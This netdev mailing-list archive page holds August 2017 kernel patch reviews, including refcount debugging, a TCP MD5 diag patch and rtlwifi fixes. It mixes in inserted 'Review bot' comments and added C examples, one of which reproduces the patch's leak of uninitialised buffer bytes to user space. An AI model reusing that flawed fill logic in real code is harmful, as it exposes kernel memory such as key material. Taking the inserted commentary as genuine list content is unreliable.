Netdev List
* Re: tip -ENOBOOT - bisected to locking/refcounts, x86/asm: Implement fast refcount overflow protection
From: Kees Cook @ 2017-08-31  4:01 UTC (permalink / raw)
  To: Mike Galbraith, David S. Miller
  Cc: LKML, Ingo Molnar, Reshetova, Elena, Network Development
In-Reply-To: <1504149176.23109.9.camel@gmx.de>

On Wed, Aug 30, 2017 at 8:12 PM, Mike Galbraith <efault@gmx.de> wrote:
> On Wed, 2017-08-30 at 19:27 -0700, Kees Cook wrote:
>
>> Interesting! Can you try with 633547973ffc3 ("net: convert
>> sk_buff.users from atomic_t to refcount_t") reverted? I'll see if
>> running haveged will help me trigger this on my system...
>
> With that (plus 230cd1279d001 fix to it) reverted, vbox boots.

Wonderful! Thank you so much for helping track this down.

So, it seems that sk_buff.users will need some more special attention
before we can convert it to refcount.

x86-refcount will saturate with refcount_dec_and_test() if the result
is negative. But that would mean at least starting at 0. FULL should
have WARNed in this case, so I remain slightly confused why it was
missed by FULL.

Ingo, I'm not sure the best path for this. It seems we need to revert
230cd1279d001 and 633547973ffc3 and then we can restore
ARCH_HAS_REFCOUNT.

-Kees

-- 
Kees Cook
Pixel Security


* Re: [net-next PATCHv6 0/2] net: ethernet: Socionext Netsec
From: Florian Fainelli @ 2017-08-31  4:06 UTC (permalink / raw)
  To: linux-arm-kernel-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r, Jassi Brar,
	netdev-u79uwXL29TY76Z2rM5mHXA, devicetree-u79uwXL29TY76Z2rM5mHXA,
	davem-fT/PcQaiUtIeIZ0/mPfg9Q
  Cc: mark.rutland-5wv7dgnIgG8, arnd-r2nGTMty4D4,
	patches-QSEj5FYQhm4dnm+yROfE0A, Jassi Brar,
	robh+dt-DgEjT+Ai2ygdnm+yROfE0A, andy-/Zus8d0mwwtBDgjK7y7TUQ
In-Reply-To: <1504088657-6102-1-git-send-email-jaswinder.singh-QSEj5FYQhm4dnm+yROfE0A@public.gmane.org>

On August 30, 2017 3:24:17 AM PDT, Jassi Brar <jassisinghbrar@gmail.com> wrote:
>Hello,
>
>The OGMA/Netsec controller is used in latest SoC from
>Socionext/Fujitsu.
>
>I am refreshing the patchset by basically using official name of the IP
>from 'OGMA' to 'Netsec'. And the company is renamed too, from Fujitsu
>to Socionext to better reflect the reality.
>
> I have addressed comments (that could be) on the last revision -->
>https://patchwork.kernel.org/patch/4540651/
>
> Of course, I have scanned changes to the drivers/net/ethernet since
>last submission and integrated whichever applicable and rebased the
>driver on top of last rc.

It does not appear to be at first glance, but I will just ask anyways, this is not yet another variant of stmmac glued just a little bit differently into the SoC right?

Will take a closer look at the register set and driver tomorrow. Thanks

-- 
Florian

* Re: tip -ENOBOOT - bisected to locking/refcounts, x86/asm: Implement fast refcount overflow protection
From: Kees Cook @ 2017-08-31  4:10 UTC (permalink / raw)
  To: Mike Galbraith, David S. Miller, Peter Zijlstra
  Cc: LKML, Ingo Molnar, Reshetova, Elena, Network Development
In-Reply-To: <CAGXu5j+uNU+wqWoCV+Kpdp+DQer4E3VuwO0mtXiW3Dtw_61QKA@mail.gmail.com>

On Wed, Aug 30, 2017 at 9:01 PM, Kees Cook <keescook@chromium.org> wrote:
> On Wed, Aug 30, 2017 at 8:12 PM, Mike Galbraith <efault@gmx.de> wrote:
>> On Wed, 2017-08-30 at 19:27 -0700, Kees Cook wrote:
>>
>>> Interesting! Can you try with 633547973ffc3 ("net: convert
>>> sk_buff.users from atomic_t to refcount_t") reverted? I'll see if
>>> running haveged will help me trigger this on my system...
>>
>> With that (plus 230cd1279d001 fix to it) reverted, vbox boots.
>
> Wonderful! Thank you so much for helping track this down.
>
> So, it seems that sk_buff.users will need some more special attention
> before we can convert it to refcount.
>
> x86-refcount will saturate with refcount_dec_and_test() if the result
> is negative. But that would mean at least starting at 0. FULL should
> have WARNed in this case, so I remain slightly confused why it was
> missed by FULL.

Actually, if this is a race condition it's possible that FULL is slow
enough to miss it...

I bet something briefly takes the refcount negative, and with
unchecked atomics, it comes back up positive again during the race.
FULL may miss the race, and x86-refcount will catch it and saturate...

-Kees

-- 
Kees Cook
Pixel Security
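
The hypothesis in this message, replayed as a single-threaded model (an added example, not code from the thread or from the kernel). The operation sequence, the type and function names, and the pinned value INT_MIN / 2 are assumptions of the model; it does not reproduce the actual sk_buff.users sequence, which the thread has not identified.

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

#define MODEL_SATURATED (INT_MIN / 2)	/* pinned value chosen for this model */

enum ref_op { REF_INC, REF_DEC };

/* Constructed interleaving: one reference held, two puts land before two gets. */
static const enum ref_op constructed_race[] = { REF_DEC, REF_DEC, REF_INC, REF_INC };
#define RACE_LEN (sizeof(constructed_race) / sizeof(constructed_race[0]))

struct replay_result {
	int  final;		/* counter value after the last operation */
	bool went_negative;	/* ground truth: did any result drop below zero? */
	bool flagged;		/* did the counter itself record the excursion? */
};

/* Unchecked counter: plain signed arithmetic, nothing is remembered. */
struct replay_result replay_unchecked(int start, const enum ref_op *ops, size_t n)
{
	struct replay_result r = { start, false, false };
	size_t i;

	for (i = 0; i < n; i++) {
		r.final += (ops[i] == REF_INC) ? 1 : -1;
		if (r.final < 0)
			r.went_negative = true;
	}
	return r;
}

/* Saturating counter: the first negative result pins the value for good. */
struct replay_result replay_saturating(int start, const enum ref_op *ops, size_t n)
{
	struct replay_result r = { start, false, false };
	size_t i;

	for (i = 0; i < n; i++) {
		r.final += (ops[i] == REF_INC) ? 1 : -1;
		if (r.final < 0) {
			r.went_negative = true;
			r.flagged = true;
			r.final = MODEL_SATURATED;	/* later ops stay negative */
		}
	}
	return r;
}

int main(void)
{
	struct replay_result u = replay_unchecked(1, constructed_race, RACE_LEN);
	struct replay_result s = replay_saturating(1, constructed_race, RACE_LEN);

	printf("unchecked:  final=%d went_negative=%d flagged=%d\n",
	       u.final, u.went_negative, u.flagged);
	printf("saturating: final=%d went_negative=%d flagged=%d\n",
	       s.final, s.went_negative, s.flagged);
	return 0;
}
```

The unchecked counter ends at its starting value with no trace of the excursion, while the saturating one stays pinned, which is the difference in behaviour the message attributes to the two cases.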


* Re: [PATCH net-next v4 2/2] tcp_diag: report TCP MD5 signing keys and addresses
From: Eric Dumazet @ 2017-08-31  4:10 UTC (permalink / raw)
  To: Ivan Delalande; +Cc: David Miller, netdev
In-Reply-To: <20170831013312.29142-3-colona@arista.com>

On Wed, 2017-08-30 at 18:33 -0700, Ivan Delalande wrote:
> Report TCP MD5 (RFC2385) signing keys, addresses and address prefixes to
> processes with CAP_NET_ADMIN requesting INET_DIAG_INFO. Currently it is
> not possible to retrieve these from the kernel once they have been
> configured on sockets.
> 
> Signed-off-by: Ivan Delalande <colona@arista.com>
> ---
>  include/uapi/linux/inet_diag.h |   1 +
>  include/uapi/linux/tcp.h       |   9 ++++
>  net/ipv4/tcp_diag.c            | 110 ++++++++++++++++++++++++++++++++++++++---
>  3 files changed, 114 insertions(+), 6 deletions(-)
> 
> diff --git a/include/uapi/linux/inet_diag.h b/include/uapi/linux/inet_diag.h
> index 678496897a68..f52ff62bfabe 100644
> --- a/include/uapi/linux/inet_diag.h
> +++ b/include/uapi/linux/inet_diag.h
> @@ -143,6 +143,7 @@ enum {
>  	INET_DIAG_MARK,
>  	INET_DIAG_BBRINFO,
>  	INET_DIAG_CLASS_ID,
> +	INET_DIAG_MD5SIG,
>  	__INET_DIAG_MAX,
>  };
>  
> diff --git a/include/uapi/linux/tcp.h b/include/uapi/linux/tcp.h
> index 030e594bab45..15c25eccab2b 100644
> --- a/include/uapi/linux/tcp.h
> +++ b/include/uapi/linux/tcp.h
> @@ -256,4 +256,13 @@ struct tcp_md5sig {
>  	__u8	tcpm_key[TCP_MD5SIG_MAXKEYLEN];		/* key (binary) */
>  };
>  
> +/* INET_DIAG_MD5SIG */
> +struct tcp_diag_md5sig {
> +	__u8	tcpm_family;
> +	__u8	tcpm_prefixlen;
> +	__u16	tcpm_keylen;
> +	__be32	tcpm_addr[4];
> +	__u8	tcpm_key[TCP_MD5SIG_MAXKEYLEN];
> +};
> +
>  #endif /* _UAPI_LINUX_TCP_H */
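
Review bot: struct tcp_diag_md5sig goes into a uapi header with no per-field documentation, while struct tcp_md5sig just above comments its key field. State that only the first tcpm_keylen bytes of tcpm_key are meaningful and how tcpm_addr is laid out for IPv4 versus IPv6, since user-space parsers will be written against this layout.
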
> diff --git a/net/ipv4/tcp_diag.c b/net/ipv4/tcp_diag.c
> index a748c74aa8b7..65d0c34a76ee 100644
> --- a/net/ipv4/tcp_diag.c
> +++ b/net/ipv4/tcp_diag.c
> @@ -16,6 +16,7 @@
>  
>  #include <linux/tcp.h>
>  
> +#include <net/netlink.h>
>  #include <net/tcp.h>
>  
>  static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
> @@ -36,6 +37,101 @@ static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
>  		tcp_get_info(sk, info);
>  }
>  
> +#ifdef CONFIG_TCP_MD5SIG
> +static void tcp_diag_md5sig_fill(struct tcp_diag_md5sig *info,
> +				 const struct tcp_md5sig_key *key)
> +{
> +	info->tcpm_family = key->family;
> +	info->tcpm_prefixlen = key->prefixlen;
> +	info->tcpm_keylen = key->keylen;
> +	memcpy(info->tcpm_key, key->key, key->keylen);


if (key->keylen < TCP_MD5SIG_MAXKEYLEN), 
then you'll leak sensitive kernel data to user space.

Since I doubt many sockets are using MD5SIG, you could simply do at the
beginning of this function :

memset(info, 0, sizeof(*info));

> +
> +	if (key->family == AF_INET) {
> +		memset(info->tcpm_addr, 0, sizeof(info->tcpm_addr));

then also remove this memset() since the prior memset would do this
already.

> +		info->tcpm_addr[0] = key->addr.a4.s_addr;
> +	}
> +	#if IS_ENABLED(CONFIG_IPV6)
> +	else if (key->family == AF_INET6) {
> +		memcpy(&info->tcpm_addr, &key->addr.a6,
> +		       sizeof(info->tcpm_addr));
> +	}
> +	#endif
> +}
> +
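
Review bot: in tcp_diag_md5sig_fill(), tcpm_addr is written only in the AF_INET and AF_INET6 branches, so for any other key->family, or for AF_INET6 when CONFIG_IPV6 is disabled, all 16 bytes reach user space uninitialised. The memset(info, 0, sizeof(*info)) suggested above covers this as well as the tail of tcpm_key. The #if IS_ENABLED(CONFIG_IPV6) and #endif lines are also indented with a tab; preprocessor directives normally start in column 0.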

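
The leak described in this review, reproduced in user space (an added example, not code from the patch or the kernel). The struct layout is copied from the quoted hunk; struct model_key, the STALE marker, the sample key and address, and the function names are assumptions made for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>			/* AF_INET, AF_UNSPEC */

#define TCP_MD5SIG_MAXKEYLEN 80		/* as in include/uapi/linux/tcp.h */
#define STALE 0xAA			/* constructed marker for old buffer contents */

/* Layout copied from the quoted hunk, with user-space integer types. */
struct tcp_diag_md5sig {
	uint8_t  tcpm_family;
	uint8_t  tcpm_prefixlen;
	uint16_t tcpm_keylen;
	uint32_t tcpm_addr[4];
	uint8_t  tcpm_key[TCP_MD5SIG_MAXKEYLEN];
};

/* Hypothetical IPv4-only stand-in for the kernel's struct tcp_md5sig_key. */
struct model_key {
	uint8_t  family;
	uint8_t  prefixlen;
	uint16_t keylen;
	uint32_t addr4;
	uint8_t  key[TCP_MD5SIG_MAXKEYLEN];
};

typedef void (*fill_fn)(struct tcp_diag_md5sig *, const struct model_key *);

/* The fill logic as posted: bytes past keylen are never written. */
static void fill_as_posted(struct tcp_diag_md5sig *info, const struct model_key *key)
{
	info->tcpm_family = key->family;
	info->tcpm_prefixlen = key->prefixlen;
	info->tcpm_keylen = key->keylen;
	memcpy(info->tcpm_key, key->key, key->keylen);
	if (key->family == AF_INET) {
		memset(info->tcpm_addr, 0, sizeof(info->tcpm_addr));
		info->tcpm_addr[0] = key->addr4;
	}
}

/* Same logic with the whole record cleared first, as the review suggests. */
static void fill_zeroed(struct tcp_diag_md5sig *info, const struct model_key *key)
{
	memset(info, 0, sizeof(*info));
	info->tcpm_family = key->family;
	info->tcpm_prefixlen = key->prefixlen;
	info->tcpm_keylen = key->keylen;
	memcpy(info->tcpm_key, key->key, key->keylen);
	if (key->family == AF_INET)
		info->tcpm_addr[0] = key->addr4;
}

/* Fill a record that starts out full of STALE bytes and count how many
 * of them would still be handed to the reader afterwards. */
size_t stale_bytes_exposed(fill_fn fill, uint8_t family)
{
	struct model_key key = { .family = family, .prefixlen = 32,
				 .keylen = 6, .addr4 = 0x0100007f };
	struct tcp_diag_md5sig out;
	const uint8_t *p = (const uint8_t *)&out;
	size_t i, n = 0;

	memcpy(key.key, "secret", 6);		/* constructed 6-byte key */
	memset(&out, STALE, sizeof(out));	/* simulate a reused buffer */
	fill(&out, &key);
	for (i = 0; i < sizeof(out); i++)
		n += (p[i] == STALE);
	return n;
}

int main(void)
{
	printf("as posted, AF_INET:   %zu stale bytes\n",
	       stale_bytes_exposed(fill_as_posted, AF_INET));
	printf("as posted, AF_UNSPEC: %zu stale bytes\n",
	       stale_bytes_exposed(fill_as_posted, AF_UNSPEC));
	printf("zeroed,    AF_INET:   %zu stale bytes\n",
	       stale_bytes_exposed(fill_zeroed, AF_INET));
	printf("zeroed,    AF_UNSPEC: %zu stale bytes\n",
	       stale_bytes_exposed(fill_zeroed, AF_UNSPEC));
	return 0;
}
```

With a 6-byte key the posted logic leaves the remaining 74 bytes of tcpm_key untouched, and a family that matches neither branch leaves tcpm_addr untouched as well.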

* Re: [PATCH 0/4] irda: move it to drivers/staging so we can delete it
From: Greg KH @ 2017-08-31  4:30 UTC (permalink / raw)
  To: Ondrej Zary; +Cc: devel, netdev, samuel, David Miller, linux-kernel
In-Reply-To: <201708292332.58569.linux@rainbow-software.org>

On Tue, Aug 29, 2017 at 11:32:58PM +0200, Ondrej Zary wrote:
> On Tuesday 29 August 2017 01:42:08 David Miller wrote:
> > From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
> > Date: Sun, 27 Aug 2017 17:03:30 +0200
> >
> > > The IRDA code has long been obsolete and broken.  So, to keep people
> > > from trying to use it, and to prevent people from having to maintain it,
> > > let's move it to drivers/staging/ so that we can delete it entirely from
> > > the kernel in a few releases.
> >
> > No objection, I'll apply this to net-next, thanks Greg.
> 
> IRDA works fine in Debian 9 (kernel 4.9) and I use it for simple file 
> transfer. Hope I'm not the only one...
> 
> # irattach /dev/ttyS0 -d tekram -s
> # irdadump
> 21:28:52.830350 xid:cmd aed8eb79 > ffffffff S=6 s=0 (14)
> 21:28:52.922368 xid:cmd aed8eb79 > ffffffff S=6 s=1 (14)
> 21:28:53.014350 xid:cmd aed8eb79 > ffffffff S=6 s=2 (14)
> 21:28:53.106338 xid:cmd aed8eb79 > ffffffff S=6 s=3 (14)
> 21:28:53.190276 xid:rsp aed8eb79 < 000035d1 S=6 s=3 Nokia 6230i hint=b125 [ 
> PnP Modem Fax Telephony IrCOMM IrOBEX ] (28)
> 21:28:53.198384 xid:cmd aed8eb79 > ffffffff S=6 s=4 (14)
> 21:28:53.290382 xid:cmd aed8eb79 > ffffffff S=6 s=5 (14)
> 21:28:53.382341 xid:cmd aed8eb79 > ffffffff S=6 s=* pentium hint=0400 [ 
> Computer ] (23)
> ^C
> 8 packets received by filter
> 
> $ obexftp -i -l MMC
> Connecting..\done
> Receiving "MMC".../<?xml version="1.0"?>
> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"
>  [ <!ATTLIST folder mem-type CDATA #IMPLIED> ]>
> <folder-listing version="1.0">
>     <parent-folder />
>     <file name="Image000.jpg" size="304300" modified="20160219T135924" 
> user-perm="RWD"/>
>     <file name="Image001.jpg" size="270037" modified="20170811T233122" 
> user-perm="RWD"/>
>     <file name="Image004.jpg" size="53519" modified="20170814T074550" 
> user-perm="RWD"/>
> ....
> $ obexftp -i -c MMC -g Image004.jpg
> Connecting..\done
> Sending "MMC"...|done
> Receiving "Image004.jpg"...-done
> Disconnecting..\done

Odd, and is this just a ir device connected to a "real" serial port, or
a specific IRDA device?

thanks,

greg k-h


* Re: tip -ENOBOOT - bisected to locking/refcounts, x86/asm: Implement fast refcount overflow protection
From: Mike Galbraith @ 2017-08-31  4:38 UTC (permalink / raw)
  To: Kees Cook, David S. Miller, Peter Zijlstra
  Cc: LKML, Ingo Molnar, Reshetova, Elena, Network Development
In-Reply-To: <CAGXu5jKYPp5D+YxtqrJXsi48UUbjfeREngsys-dU1eP4RnnL+w@mail.gmail.com>

On Wed, 2017-08-30 at 21:10 -0700, Kees Cook wrote:
> On Wed, Aug 30, 2017 at 9:01 PM, Kees Cook <keescook@chromium.org> wrote:
> > On Wed, Aug 30, 2017 at 8:12 PM, Mike Galbraith <efault@gmx.de> wrote:
> >> On Wed, 2017-08-30 at 19:27 -0700, Kees Cook wrote:
> >>
> >>> Interesting! Can you try with 633547973ffc3 ("net: convert
> >>> sk_buff.users from atomic_t to refcount_t") reverted? I'll see if
> >>> running haveged will help me trigger this on my system...
> >>
> >> With that (plus 230cd1279d001 fix to it) reverted, vbox boots.
> >
> > Wonderful! Thank you so much for helping track this down.
> >
> > So, it seems that sk_buff.users will need some more special attention
> > before we can convert it to refcount.
> >
> > x86-refcount will saturate with refcount_dec_and_test() if the result
> > is negative. But that would mean at least starting at 0. FULL should
> > have WARNed in this case, so I remain slightly confused why it was
> > missed by FULL.
> 
> Actually, if this is a race condition it's possible that FULL is slow
> enough to miss it...
> 
> I bet something briefly takes the refcount negative, and with
> > unchecked atomics, it comes back up positive again during the race.
> FULL may miss the race, and x86-refcount will catch it and saturate...

Hm, I'll go have a stare.. not that that's likely to turn anything up,
memory ordering stares usually inducing a zombie like state.

	-Mike


* Re: [PATCH] rtlwifi: rtl8723be: fix duplicated code for different branches
From: Larry Finger @ 2017-08-31  4:42 UTC (permalink / raw)
  To: Gustavo A. R. Silva, Chaoming Li, Kalle Valo
  Cc: linux-wireless, netdev, linux-kernel
In-Reply-To: <20170830170424.GA19424@embeddedgus>

On 08/30/2017 12:04 PM, Gustavo A. R. Silva wrote:
> Refactor code in order to avoid identical code for different branches.
> 
> Addresses-Coverity-ID: 1248728
> Signed-off-by: Gustavo A. R. Silva <gustavo@embeddedor.com>

According to Realtek, this change is OK.

Acked-by: Larry Finger <Larry.Finger@lwfinger.net>

Thanks,

Larry

> ---
> This issue was reported by Coverity and it was tested by compilation only.
> Please, verify if this is not a copy/paste error.
> Also, notice this code has been there since 2014.
> 
>   drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c | 8 ++------
>   1 file changed, 2 insertions(+), 6 deletions(-)
> 
> diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c
> index 131c0d1..15c117e 100644
> --- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c
> +++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/dm.c
> @@ -883,12 +883,8 @@ static void rtl8723be_dm_txpower_tracking_callback_thermalmeter(
>   	if ((rtldm->power_index_offset[RF90_PATH_A] != 0) &&
>   	    (rtldm->txpower_track_control)) {
>   		rtldm->done_txpower = true;
> -		if (thermalvalue > rtlefuse->eeprom_thermalmeter)
> -			rtl8723be_dm_tx_power_track_set_power(hw, BBSWING, 0,
> -							     index_for_channel);
> -		else
> -			rtl8723be_dm_tx_power_track_set_power(hw, BBSWING, 0,
> -							     index_for_channel);
> +		rtl8723be_dm_tx_power_track_set_power(hw, BBSWING, 0,
> +						      index_for_channel);
>   
>   		rtldm->swing_idx_cck_base = rtldm->swing_idx_cck;
>   		rtldm->swing_idx_ofdm_base[RF90_PATH_A] =
> 
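
Review bot: the commit message should record why the removed else arm of the thermalvalue > rtlefuse->eeprom_thermalmeter test was not meant to differ. The changelog only says the change was tested by compilation and asks whether this is a copy/paste error; adding the vendor confirmation there keeps the answer in the history rather than only in this thread.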


* Re: [GIT] Networking
From: Kalle Valo @ 2017-08-31  4:44 UTC (permalink / raw)
  To: David Miller; +Cc: pavel, xiyou.wangcong, torvalds, akpm, netdev, linux-kernel
In-Reply-To: <20170830.105447.125174575140677062.davem@davemloft.net>

David Miller <davem@davemloft.net> writes:

> From: Kalle Valo <kvalo@codeaurora.org>
> Date: Wed, 30 Aug 2017 20:31:31 +0300
>
>> AFAICS the bug was introduced by 9df86e2e702c6 back in 2010. If the bug
>> has been there for 7 years so waiting for a few more weeks should not
>> hurt.
>
> As a maintainer you have a right to handle bug fixing in that way, but
> certainly that is not how I would handle this.
>
> It's easy to validate this fix, it's extremely unlikely to cause
> a regression, and fixes a problem someone actually was able to
> trigger.
>
> Deferring to -next only has the side effect of making people wait
> longer for the fix.

Yeah, you are right there. I did actually ponder which tree I should
commit it to back in July but due to various reasons decided differently.

-- 
Kalle Valo


* Re: [PATCH] rtlwifi: btcoex: 23b 1ant: fix duplicated code for different branches
From: Larry Finger @ 2017-08-31  4:48 UTC (permalink / raw)
  To: Gustavo A. R. Silva, Chaoming Li, Kalle Valo
  Cc: linux-wireless, netdev, linux-kernel
In-Reply-To: <20170830134223.GA13596@embeddedgus>

On 08/30/2017 08:42 AM, Gustavo A. R. Silva wrote:
> Refactor code in order to avoid identical code for different branches.
> 
> This issue was detected with the help of Coccinelle.
> 
> Addresses-Coverity-ID: 1226788
> Signed-off-by: Gustavo A. R. Silva <gustavo@embeddedor.com>
> ---
> This issue was reported by Coverity and it was tested by compilation only.
> I'm suspicious this may be a copy/paste error. Please, verify.
> 
>   .../net/wireless/realtek/rtlwifi/btcoexist/halbtc8723b1ant.c   | 10 ++--------
>   1 file changed, 2 insertions(+), 8 deletions(-)

This change is not correct. When bt_link_info->sco_exist is true, the call should be

				halbtc8723b1ant_limited_rx(btcoexist,
							   NORMAL_EXEC, true,
							   false, 0x5);

NACK

I will push the correct patch.

Larry


* Re: [PATCH net-next] devlink: Maintain consistency in mac field name
From: David Miller @ 2017-08-31  5:06 UTC (permalink / raw)
  To: dsahern; +Cc: netdev, arkadis
In-Reply-To: <1504138050-20170-1-git-send-email-dsahern@gmail.com>

From: David Ahern <dsahern@gmail.com>
Date: Wed, 30 Aug 2017 17:07:30 -0700

> IPv4 name uses "destination ip" as does the IPv6 patch set.
> Make the mac field consistent.
> 
> Signed-off-by: David Ahern <dsahern@gmail.com>

Applied, thanks.


* Re: [PATCH net-next] liquidio: fix crash in presence of zeroed-out base address regs
From: David Miller @ 2017-08-31  5:07 UTC (permalink / raw)
  To: felix.manlunas
  Cc: netdev, raghu.vatsavayi, derek.chickles, satananda.burla,
	ricardo.farrington
In-Reply-To: <20170830231953.GA14744@felix-thinkpad.cavium.com>

From: Felix Manlunas <felix.manlunas@cavium.com>
Date: Wed, 30 Aug 2017 16:19:53 -0700

> From: Rick Farrington <ricardo.farrington@cavium.com>
> 
> Fix crash in linux PF driver when BARs have been cleared/de-programmed;
> fail early init (prior to mapping BARs) if the BAR0 or
> BAR1 registers are zero.
> 
> This situation can arise when the PF is added to a VM (PCI pass-through),
> then a PF FLR is issued (in the VM).  After this occurs, the BAR registers
> will be zero. If we attempt to load the PF driver in the host
> (after VM has been shutdown), the host can reset.
> 
> Signed-off-by: Rick Farrington <ricardo.farrington@cavium.com>
> Signed-off-by: Raghu Vatsavayi <raghu.vatsavayi@cavium.com>
> Signed-off-by: Felix Manlunas <felix.manlunas@cavium.com>

Applied, thanks.


* Re: [pull request][net-next 0/3] Mellanox, mlx5 GRE tunnel offloads
From: David Miller @ 2017-08-31  5:15 UTC (permalink / raw)
  To: saeedm; +Cc: netdev
In-Reply-To: <20170830230409.15176-1-saeedm@mellanox.com>

From: Saeed Mahameed <saeedm@mellanox.com>
Date: Thu, 31 Aug 2017 02:04:06 +0300

> The following changes provide GRE tunnel offloads for mlx5 ethernet netdevice driver.
> 
> For more details please see tag log message below.
> Please pull and let me know if there's any problem.
> 
> Note: this series doesn't conflict with the ongoing net mlx5 submission.

Looks good, pulled.


* Re: [PATCH] net: dccp: Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv()
From: David Miller @ 2017-08-31  5:16 UTC (permalink / raw)
  To: tulup; +Cc: gerrit, netdev, linux-kernel, dccp
In-Reply-To: <20170830090435.58406d1b@dev>

From: Andrii Vladyka <tulup@mail.ru>
Date: Wed, 30 Aug 2017 09:04:35 +0300

> +	if (opt_skb) 
                    ^^^^

Trailing whitespace.

> @@ -653,6 +647,36 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
>  		__kfree_skb(opt_skb);
>  	kfree_skb(skb);
>  	return 0;
> +	
   ^^^^^^^

Likewise.


* [PATCH net-next] bridge: add tracepoint in br_fdb_update
From: Roopa Prabhu @ 2017-08-31  5:18 UTC (permalink / raw)
  To: davem; +Cc: netdev, nikolay, f.fainelli, andrew, bridge

From: Roopa Prabhu <roopa@cumulusnetworks.com>

This extends bridge fdb table tracepoints to also cover
learned fdb entries in the br_fdb_update path. Note that
unlike other tracepoints I have moved this to when the fdb
is modified because this is in the datapath and can generate
a lot of noise in the trace output. br_fdb_update is also called
from added_by_user context in the NTF_USE case which is already
traced ..hence the !added_by_user check.

Signed-off-by: Roopa Prabhu <roopa@cumulusnetworks.com>
---
 include/trace/events/bridge.h | 31 +++++++++++++++++++++++++++++++
 net/bridge/br_fdb.c           |  5 ++++-
 net/core/net-traces.c         |  1 +
 3 files changed, 36 insertions(+), 1 deletion(-)

diff --git a/include/trace/events/bridge.h b/include/trace/events/bridge.h
index 0f1cde0..1bee3e7 100644
--- a/include/trace/events/bridge.h
+++ b/include/trace/events/bridge.h
@@ -92,6 +92,37 @@ TRACE_EVENT(fdb_delete,
 		  __entry->addr[4], __entry->addr[5], __entry->vid)
 );
 
+TRACE_EVENT(br_fdb_update,
+
+	TP_PROTO(struct net_bridge *br, struct net_bridge_port *source,
+		 const unsigned char *addr, u16 vid, bool added_by_user),
+
+	TP_ARGS(br, source, addr, vid, added_by_user),
+
+	TP_STRUCT__entry(
+		__string(br_dev, br->dev->name)
+		__string(dev, source->dev->name)
+		__array(unsigned char, addr, ETH_ALEN)
+		__field(u16, vid)
+		__field(bool, added_by_user)
+	),
+
+	TP_fast_assign(
+		__assign_str(br_dev, br->dev->name);
+		__assign_str(dev, source->dev->name);
+		memcpy(__entry->addr, addr, ETH_ALEN);
+		__entry->vid = vid;
+		__entry->added_by_user = added_by_user;
+	),
+
+	TP_printk("br_dev %s source %s addr %02x:%02x:%02x:%02x:%02x:%02x vid %u added_by_user %d",
+		  __get_str(br_dev), __get_str(dev), __entry->addr[0],
+		  __entry->addr[1], __entry->addr[2], __entry->addr[3],
+		  __entry->addr[4], __entry->addr[5], __entry->vid,
+		  __entry->added_by_user)
+);
+
+
 #endif /* _TRACE_BRIDGE_H */
 
 /* This part must be outside protection */
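
Review bot: two blank lines are added between the closing ); of TRACE_EVENT(br_fdb_update) and the #endif; one is enough, matching the spacing after the fdb_delete event above.
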
diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c
index be5e1da..4ea5c8b 100644
--- a/net/bridge/br_fdb.c
+++ b/net/bridge/br_fdb.c
@@ -583,8 +583,10 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source,
 				fdb->updated = now;
 			if (unlikely(added_by_user))
 				fdb->added_by_user = 1;
-			if (unlikely(fdb_modified))
+			if (unlikely(fdb_modified)) {
+				trace_br_fdb_update(br, source, addr, vid, added_by_user);
 				fdb_notify(br, fdb, RTM_NEWNEIGH);
+			}
 		}
 	} else {
 		spin_lock(&br->hash_lock);
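
Review bot: the changelog says the NTF_USE case is already traced, "hence the !added_by_user check", but trace_br_fdb_update() is called here under if (unlikely(fdb_modified)) with no such check, and the call added in the next hunk is unguarded too. Either add the !added_by_user test around both calls or drop that sentence from the changelog. The new call line also runs past 80 columns.
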
@@ -593,6 +595,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source,
 			if (fdb) {
 				if (unlikely(added_by_user))
 					fdb->added_by_user = 1;
+				trace_br_fdb_update(br, source, addr, vid, added_by_user);
 				fdb_notify(br, fdb, RTM_NEWNEIGH);
 			}
 		}
diff --git a/net/core/net-traces.c b/net/core/net-traces.c
index 4a0292c..1132820 100644
--- a/net/core/net-traces.c
+++ b/net/core/net-traces.c
@@ -42,6 +42,7 @@ EXPORT_TRACEPOINT_SYMBOL_GPL(fib6_table_lookup);
 EXPORT_TRACEPOINT_SYMBOL_GPL(br_fdb_add);
 EXPORT_TRACEPOINT_SYMBOL_GPL(br_fdb_external_learn_add);
 EXPORT_TRACEPOINT_SYMBOL_GPL(fdb_delete);
+EXPORT_TRACEPOINT_SYMBOL_GPL(br_fdb_update);
 #endif
 
 EXPORT_TRACEPOINT_SYMBOL_GPL(kfree_skb);
-- 
2.1.4


* Re: [PATCH] net: dccp: Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv()
From: Andrii @ 2017-08-31  5:27 UTC (permalink / raw)
  To: David Miller; +Cc: gerrit, netdev, linux-kernel, dccp
In-Reply-To: <20170830.221649.818214075248119092.davem@davemloft.net>

I'll fix and re-send. Thanks.


On 8/31/2017 8:16 AM, David Miller wrote:
> From: Andrii Vladyka <tulup@mail.ru>
> Date: Wed, 30 Aug 2017 09:04:35 +0300
>
>> +	if (opt_skb)
>                      ^^^^
>
> Trailing whitespace.
>
>> @@ -653,6 +647,36 @@ static int dccp_v6_do_rcv(struct sock *sk, struct sk_buff *skb)
>>   		__kfree_skb(opt_skb);
>>   	kfree_skb(skb);
>>   	return 0;
>> +	
>     ^^^^^^^
>
> Likewise.


* [PATCH] net: dccp: Add handling of IPV6_PKTOPTIONS to dccp_v6_do_rcv()
From: Andrii @ 2017-08-31  5:28 UTC (permalink / raw)
  To: David Miller; +Cc: gerrit, netdev, linux-kernel, dccp
